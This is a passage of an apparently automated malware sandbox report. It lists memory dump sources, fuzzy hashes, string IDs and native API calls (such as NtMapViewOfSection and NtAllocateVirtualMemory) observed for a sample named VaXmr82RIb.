                                                      • Opcode Fuzzy Hash: a13a243b497bcdc667bcbccfbe9c09d1ed2bfc984a124b7871796ee9a5e1eec7
                                                      • Instruction Fuzzy Hash: AE12B476F002398FCB18DF68C894A59B7F2BB84214F1985AADD0EE7341DA349D85CF80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +4?h
                                                      • API String ID: 0-1856141625
                                                      • Opcode ID: 550a8aa94720b5a36416f4cb712964d2c2ce6e555a65a1f78ea2ed66bcee034d
                                                      • Instruction ID: 883ddc249db93e5452aef44c0c23d50beccce446ad48d51989c609fbf29c47d2
                                                      • Opcode Fuzzy Hash: 550a8aa94720b5a36416f4cb712964d2c2ce6e555a65a1f78ea2ed66bcee034d
                                                      • Instruction Fuzzy Hash: 04F1B579F106248F8B48EB6DE89496EB7E6EF8C7107094169E806EF364DA34DC01CBD5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -q90
                                                      • API String ID: 0-242358158
                                                      • Opcode ID: 73cbb86404f16f19ae91866a46cd2eaee45f8c8e6a4495bbea2dd1f3c1e47ac7
                                                      • Instruction ID: d0301129be084781318e0b5b3479011ba084097dd9e15096d4a21dd99ab0df26
                                                      • Opcode Fuzzy Hash: 73cbb86404f16f19ae91866a46cd2eaee45f8c8e6a4495bbea2dd1f3c1e47ac7
                                                      • Instruction Fuzzy Hash: 1E024EB6F106288FCB58DFA8C89059DB7F6BB88314715866DD809EB355DB35EC42CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: p
                                                      • API String ID: 0-2181537457
                                                      • Opcode ID: 880c61e28d761f51046b86f8b91bf705a2aad45f7117cb091f62e36a402344d6
                                                      • Instruction ID: b52a463c4eb9cdbc3fcbeb529573684ecb5a5d324b8a3465b211a1cf225a6e34
                                                      • Opcode Fuzzy Hash: 880c61e28d761f51046b86f8b91bf705a2aad45f7117cb091f62e36a402344d6
                                                      • Instruction Fuzzy Hash: 26F17B74B142058FCB48CFA8D9D055AFBE3AF88300729C569E85ADB356DA75EC47CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec2c3c66d94bbfe0a0629dcacbe11aa96de8e4476ef6a567e48d8f8c2f799d6d
                                                      • Instruction ID: 3c6a0f22d59c6203944c650900a0c77ef477bed5043a5ce7403b2dd29ad6b6d6
                                                      • Opcode Fuzzy Hash: ec2c3c66d94bbfe0a0629dcacbe11aa96de8e4476ef6a567e48d8f8c2f799d6d
                                                      • Instruction Fuzzy Hash: 14F23F76A012198FDB54DF59CC84A99F7B3BB88314F2A82AAD509E7351D730ED86CF40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "H-z
                                                      • API String ID: 0-3305940508
                                                      • Opcode ID: 577f656907ab920559f1d7fc13e11e157ba41879900d9136babb4196751882cf
                                                      • Instruction ID: c4a723105a39efec5445813f78d943f6273c32008ddd2eb8c386201a9873c37c
                                                      • Opcode Fuzzy Hash: 577f656907ab920559f1d7fc13e11e157ba41879900d9136babb4196751882cf
                                                      • Instruction Fuzzy Hash: FC027D76E102259FDB18DF9CD880999B7F2BB88310B1A8599EC05EB351D775EC42CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 7i4A
                                                      • API String ID: 0-2974772570
                                                      • Opcode ID: 2b79bd5bc12d4e3cda80e0a82516a8216990f8a3669c8a1f4fa05ed401cff774
                                                      • Instruction ID: e280cbb0b021a18c30060cbb22287b094c882f87c8bc4f0db989622c74f0c144
                                                      • Opcode Fuzzy Hash: 2b79bd5bc12d4e3cda80e0a82516a8216990f8a3669c8a1f4fa05ed401cff774
                                                      • Instruction Fuzzy Hash: 6CE1CC35B107198FCB14DF6DC8C0AAAB7B6BF98200F5981AAD419EF361DB70AC45CB54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6"
                                                      • API String ID: 0-216104082
                                                      • Opcode ID: 145a950850fa156324664729adcc5155bd3af48c081ad335ea2e12d7636ea689
                                                      • Instruction ID: 034927a6cceb09156aacd9c4f364ac984fa7fdd264713e8b56de4e29a17a4923
                                                      • Opcode Fuzzy Hash: 145a950850fa156324664729adcc5155bd3af48c081ad335ea2e12d7636ea689
                                                      • Instruction Fuzzy Hash: 25D11A76F002258FC718DF68C89099ABBB6AF8431071A856EDD19EB352D735DC46CBC0
                                                      APIs
                                                      • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 03604CEE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: SectionView
                                                      • String ID:
                                                      • API String ID: 1323581903-0
                                                      • Opcode ID: 113e51c8592e366371de2df5d2f6dff6b57f7aa8631497db1dd27cd24e7c4256
                                                      • Instruction ID: f5282f260d8ca35cac27d138eb492140fa148b8265dfab9c394bbc136b836087
                                                      • Opcode Fuzzy Hash: 113e51c8592e366371de2df5d2f6dff6b57f7aa8631497db1dd27cd24e7c4256
                                                      • Instruction Fuzzy Hash: 4A31D1B69002089FCF11DFAAD884ADEBFB5FF4C324F15841AE918A3250C7399951CFA0
                                                      APIs
                                                      • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 03604CEE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: SectionView
                                                      • String ID:
                                                      • API String ID: 1323581903-0
                                                      • Opcode ID: 69214fd79fbee01366bdb41f537e43f4a4999f47eadf478085be2050b8f69c0b
                                                      • Instruction ID: 04e9e84175774d1270f94159c7332e5e8ce8478c063f7294c73fae4214f6a8a1
                                                      • Opcode Fuzzy Hash: 69214fd79fbee01366bdb41f537e43f4a4999f47eadf478085be2050b8f69c0b
                                                      • Instruction Fuzzy Hash: FA31C0B5900209AFCF11DFAAD884ADEBFF5FF48324F14841AE918A3250C7799954DFA4
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03604639
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: 929cb78295074123d2757d82f09c9566e077270601b2d1d73f6bf59b3e8217d5
                                                      • Instruction ID: 1f33d0fa83a0a6b69d6d9ea32eb178bb444bf0dcc858cb4851b3c5d7decaaf65
                                                      • Opcode Fuzzy Hash: 929cb78295074123d2757d82f09c9566e077270601b2d1d73f6bf59b3e8217d5
                                                      • Instruction Fuzzy Hash: 9E21E4B1D012499FCB10DFAAD980AEEFBF5FF48314F24842AE419A7240D7759955CBA0
                                                      APIs
                                                      • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03604B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: CreateSection
                                                      • String ID:
                                                      • API String ID: 2449625523-0
                                                      • Opcode ID: b671d3569f769d2f8114d1cab4fe190d96615fdef07fed2e56a24ea0746109d7
                                                      • Instruction ID: 344cb6ae012041b93c0671f57c44b080bf7227cf50264948ae354dc20b322ccb
                                                      • Opcode Fuzzy Hash: b671d3569f769d2f8114d1cab4fe190d96615fdef07fed2e56a24ea0746109d7
                                                      • Instruction Fuzzy Hash: 8721F6B1D00209AFCB10DFAAD980AEEFBB4FF48310F50851AE518A3240C7759955CFE0
                                                      APIs
                                                      • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03604A59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FileOpen
                                                      • String ID:
                                                      • API String ID: 2669468079-0
                                                      • Opcode ID: 235f98448840b89194b359f5864281ce6ee0aa3ba1c72743d72e8962787e2169
                                                      • Instruction ID: bd1fd625bd7f0753b066e634519759a2cf18b01a5b5e6fffb650ded16c9cec0a
                                                      • Opcode Fuzzy Hash: 235f98448840b89194b359f5864281ce6ee0aa3ba1c72743d72e8962787e2169
                                                      • Instruction Fuzzy Hash: F42107B1D012199FCB10DFAAD985ADEFBB4FF48314F20852AE518A7340C7759A55CFA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3
                                                      • API String ID: 0-1770408200
                                                      • Opcode ID: 216348ffb753c184e24335d206328bc19955127bb8daf210e733658b5084bbc2
                                                      • Instruction ID: 36db588a560ccff427bee20c8d3863eb226c1bed13784e82b3fe74d74c6aff27
                                                      • Opcode Fuzzy Hash: 216348ffb753c184e24335d206328bc19955127bb8daf210e733658b5084bbc2
                                                      • Instruction Fuzzy Hash: E4C17FB6B101258FD718DA69C98056AF7E6EB8421071A85AEDC09EB351DB35EC46CBC0
                                                      APIs
                                                      • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 03604B34
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: CreateSection
                                                      • String ID:
                                                      • API String ID: 2449625523-0
                                                      • Opcode ID: 0873170257bd00be8458567610902477e3fa2a2f68473a018227fddd7d9a5969
                                                      • Instruction ID: 04ec29af806c264973b9107e6a5d76f2bb3e5ac292532ea531e4adeabdffd466
                                                      • Opcode Fuzzy Hash: 0873170257bd00be8458567610902477e3fa2a2f68473a018227fddd7d9a5969
                                                      • Instruction Fuzzy Hash: D02105B1D00209AFCB10DFAAD980ADEFBB4FF48310F50841AE518A3240C7759954CFE0
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0360470B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: e95e2f5b8343f174193e92e4743d4f3fd25cf69469eda67b7c9dbe571d5c4952
                                                      • Instruction ID: c4ac03e0c1fa06fd150f3e7a01a6716fe5a87177c005d2439a5bacc46e51bf64
                                                      • Opcode Fuzzy Hash: e95e2f5b8343f174193e92e4743d4f3fd25cf69469eda67b7c9dbe571d5c4952
                                                      • Instruction Fuzzy Hash: C22114B5D002099FCB10DFAAC885ADEFBB5FF48324F50842AE519A7250C7799944CFA0
                                                      APIs
                                                      • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 03604639
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: MemoryProtectVirtual
                                                      • String ID:
                                                      • API String ID: 2706961497-0
                                                      • Opcode ID: afb921645de4149d218b096ecb2ea6302cbe44eb9a0ffdce46643107cbc4194c
                                                      • Instruction ID: b272918276b7a9dd2c35cdb2db22625b8a2009d91bd8e544843a57f654cb8249
                                                      • Opcode Fuzzy Hash: afb921645de4149d218b096ecb2ea6302cbe44eb9a0ffdce46643107cbc4194c
                                                      • Instruction Fuzzy Hash: FD21F2B1D002499FCB10DFAAD980AAEFBF5FF48310F60842AE519A3240D775A901CBA0
                                                      APIs
                                                      • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 03604A59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FileOpen
                                                      • String ID:
                                                      • API String ID: 2669468079-0
                                                      • Opcode ID: 70986e51299fbfe50db80354a4f39b1d51465d87192d7ff46405ece2eaf21271
                                                      • Instruction ID: 1923a3f933a352f154f7a33a55388763009100525fa1f79c7ab6ee72c6728eb7
                                                      • Opcode Fuzzy Hash: 70986e51299fbfe50db80354a4f39b1d51465d87192d7ff46405ece2eaf21271
                                                      • Instruction Fuzzy Hash: C221E4B1D01219AFCB10DFAAD985ADEFBB8FF48310F50842AE518A7240C7759A54CFE5
                                                      APIs
                                                      • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 03604E8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: ControlDeviceFile
                                                      • String ID:
                                                      • API String ID: 3512290074-0
                                                      • Opcode ID: 783cd993e91056a23b8446f0e65b8386a6e500778a2215013467234700d5f60e
                                                      • Instruction ID: 53bf8fb10847eee8f2035512e1faa5258139cfc3ee7b3b604a871fb180c51823
                                                      • Opcode Fuzzy Hash: 783cd993e91056a23b8446f0e65b8386a6e500778a2215013467234700d5f60e
                                                      • Instruction Fuzzy Hash: C6210371D002099FCF21DFAAC884AEFBBB5FF48314F14841AE919A7250CB799955DFA0
                                                      APIs
                                                      • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 03604E8E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: ControlDeviceFile
                                                      • String ID:
                                                      • API String ID: 3512290074-0
                                                      • Opcode ID: c15daefae6a6ed00f99d4582982eb1748dd6c7b265da99e8769a7c56287826f0
                                                      • Instruction ID: 197cb4a3188743f4579439553ce6e41ef0604e8f937649cf04734dddcf5418ee
                                                      • Opcode Fuzzy Hash: c15daefae6a6ed00f99d4582982eb1748dd6c7b265da99e8769a7c56287826f0
                                                      • Instruction Fuzzy Hash: 0F2114718002099FCF11DFAAC884AEFBBF5FF48314F14841AE519A3250C7799955CFA0
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0360470B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 81dd07245762922c8a306e76689af0d7c7773858760b01fb13925da2d1874d46
                                                      • Instruction ID: fa3bb7c2335f2191e46ec9ac767401a7812f22a2eced079fbadcb119a7acf87f
                                                      • Opcode Fuzzy Hash: 81dd07245762922c8a306e76689af0d7c7773858760b01fb13925da2d1874d46
                                                      • Instruction Fuzzy Hash: 7821E2B1D002099FCB10DFAAC885ADEFBF5FF48314F50842AE519A7250CB7999448FA0
                                                      APIs
                                                      • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 03604DB7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FileInformationQueryVolume
                                                      • String ID:
                                                      • API String ID: 634242254-0
                                                      • Opcode ID: 5cacfb1961aaaf707642cc0ea0e7fb6074e7c4eb97501e45fd7dd67d5348150f
                                                      • Instruction ID: 405a59f3073da40ba40573f08d21b2fda9812cee39efb0022b0298e9a9431d52
                                                      • Opcode Fuzzy Hash: 5cacfb1961aaaf707642cc0ea0e7fb6074e7c4eb97501e45fd7dd67d5348150f
                                                      • Instruction Fuzzy Hash: 5C2138B1D002098FCB10DFAAD880AEFFBF5AF88314F14842AD419A7240C7749541CFA0
                                                      APIs
                                                      • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 03604DB7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: FileInformationQueryVolume
                                                      • String ID:
                                                      • API String ID: 634242254-0
                                                      • Opcode ID: 8a0ce94b24c6c5f005bd32f820a4d601defb7f80bfbc4f55a36c051fa4c44b40
                                                      • Instruction ID: 251c53a1098225e4a43a31caf393f7a740a5786813eebc030fe86e3f729bf96a
                                                      • Opcode Fuzzy Hash: 8a0ce94b24c6c5f005bd32f820a4d601defb7f80bfbc4f55a36c051fa4c44b40
                                                      • Instruction Fuzzy Hash: 2921F7B1D002499FCB10DFAAC884AEFFBF5AF48314F14842AD529A7250C7799945CFA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 0f6dc075d38e7539c8fb9817e4e2a994151e2f5f90de768612d59b46d32ed360
                                                      • Instruction ID: 87c0dcf7f2d2e8bb0ff67febdcc170ff5eb347b58c9760df4153a6b5aa19ed11
                                                      • Opcode Fuzzy Hash: 0f6dc075d38e7539c8fb9817e4e2a994151e2f5f90de768612d59b46d32ed360
                                                      • Instruction Fuzzy Hash: 2A1137B1D002488ACB20DFAAD8857EFBFF4AB98324F248459D419A7340CB78A545CFA4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: e2989e2f797050bb7992ce393a20f50a2cf28b35f2e288a070e646498a48ecd7
                                                      • Instruction ID: f12ef47c7eb0c7ab13090b8aebba9fcbbfb34ad29b04a1e99a33d566ccf47bc0
                                                      • Opcode Fuzzy Hash: e2989e2f797050bb7992ce393a20f50a2cf28b35f2e288a070e646498a48ecd7
                                                      • Instruction Fuzzy Hash: 15112BB1D003488ACB20DFAAC4457AFFFF4AB88324F148459D519A7340CB786544CFA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Y+g
                                                      • API String ID: 0-3050812498
                                                      • Opcode ID: b56c917c940e084bd7e8fb14881b0c4623463fe83eafa9c4c641ec513167f13d
                                                      • Instruction ID: b04aaac01a561799cf0434610fcbf0f2a5f4972b79c152a38697254f01884750
                                                      • Opcode Fuzzy Hash: b56c917c940e084bd7e8fb14881b0c4623463fe83eafa9c4c641ec513167f13d
                                                      • Instruction Fuzzy Hash: 69A1BC35B053098FCB18EFA9C9D055DB7B2AF89314B298179E50AEF352DA74AC46CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (nq
                                                      • API String ID: 0-2756854522
                                                      • Opcode ID: af0417bb595fd1cb78327332d9e10feeafcae4a0cc9f2a83a943427d794c708c
                                                      • Instruction ID: e873fd0059fb3abecc14b26abcc67c30be5958be30766f8a915982862d9df057
                                                      • Opcode Fuzzy Hash: af0417bb595fd1cb78327332d9e10feeafcae4a0cc9f2a83a943427d794c708c
                                                      • Instruction Fuzzy Hash: 7CB17F75B106298BD718CF99C98095AF7A7BB88310B29855AD809EB355DB31EC86CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Y+g
                                                      • API String ID: 0-3050812498
                                                      • Opcode ID: 100013a7404b716f59dc6eb368aaa694ae655aa5b68c068c117a97b46892247d
                                                      • Instruction ID: 0fd18560628837ee928572ac68ffb5cc499238b4ce9ccf67653bdcd644a6db43
                                                      • Opcode Fuzzy Hash: 100013a7404b716f59dc6eb368aaa694ae655aa5b68c068c117a97b46892247d
                                                      • Instruction Fuzzy Hash: 6F91ED35F007098FCB18EFA9D8D0569BBB2AF89314B19817DD50AEF352DA75AC46CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PHjq
                                                      • API String ID: 0-751881793
                                                      • Opcode ID: ae8018027a1ecb74021e43a7339fb9af60609a9c6f4bf389c5fc750227bf30fc
                                                      • Instruction ID: f5530e31b7c2ae1700fb0f65b4978f27635baeb3cfe9426afc0c516ef3d43593
                                                      • Opcode Fuzzy Hash: ae8018027a1ecb74021e43a7339fb9af60609a9c6f4bf389c5fc750227bf30fc
                                                      • Instruction Fuzzy Hash: 47A15A35B005148FCB58CF69D99496EB7E7FB88314B19856DE819EB351DB72EC02CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 7i4A
                                                      • API String ID: 0-2974772570
                                                      • Opcode ID: f6529f3027d4d20801611c01e4cc02e1298eacbf732e2e4f903acfb665829342
                                                      • Instruction ID: 9ab200521e24ce31c73039662519df50fa89302a14e61641e3328007a2b44036
                                                      • Opcode Fuzzy Hash: f6529f3027d4d20801611c01e4cc02e1298eacbf732e2e4f903acfb665829342
                                                      • Instruction Fuzzy Hash: C891CE35B107198FDB14DFA9C8C0A9EB7B2BF98200F6981AAD515EF351DB70AC458F44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: u
                                                      • API String ID: 0-4067256894
                                                      • Opcode ID: 553d7b793fa6dc25e6a9eaca9d6ca7490eb08486b0b49d275f18e4110e54c1fc
                                                      • Instruction ID: ee97bb0058c836cc2dddf612b3c0a7123da16bd8e2abf7590bcd0994648ec385
                                                      • Opcode Fuzzy Hash: 553d7b793fa6dc25e6a9eaca9d6ca7490eb08486b0b49d275f18e4110e54c1fc
                                                      • Instruction Fuzzy Hash: 93B12B75E002298FCB64CF58C990B9AF7B2FB88310F1585EAD959A7341DB35AD81CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -4/2
                                                      • API String ID: 0-2327153758
                                                      • Opcode ID: dd137d2665d42adc35da840b12f4e8a91d8719932f8701eb4f72510f4ceb5cee
                                                      • Instruction ID: cbb78565cac7b8dab7b6d15bffac02ad32062c8a2ed5d64ebc5ee3dab0d91547
                                                      • Opcode Fuzzy Hash: dd137d2665d42adc35da840b12f4e8a91d8719932f8701eb4f72510f4ceb5cee
                                                      • Instruction Fuzzy Hash: 8391A173F116298FCB14CE6CD98459EF7F2AB8831075A866AE815FB754E670AD01CBC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Y+g
                                                      • API String ID: 0-3050812498
                                                      • Opcode ID: 41fb80e1c265a29d5d68579bec9e6c35cd2bf0c834eced46949ea049a83ed048
                                                      • Instruction ID: 2a0d07840c74afca2604213e8c4c4b3f17d680d0beb5a0d405c19abac149797c
                                                      • Opcode Fuzzy Hash: 41fb80e1c265a29d5d68579bec9e6c35cd2bf0c834eced46949ea049a83ed048
                                                      • Instruction Fuzzy Hash: 9571CC34B053098FCB18EFA9C9D0559BBB2AF89314B19817ED906EF356DA74AC46CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false
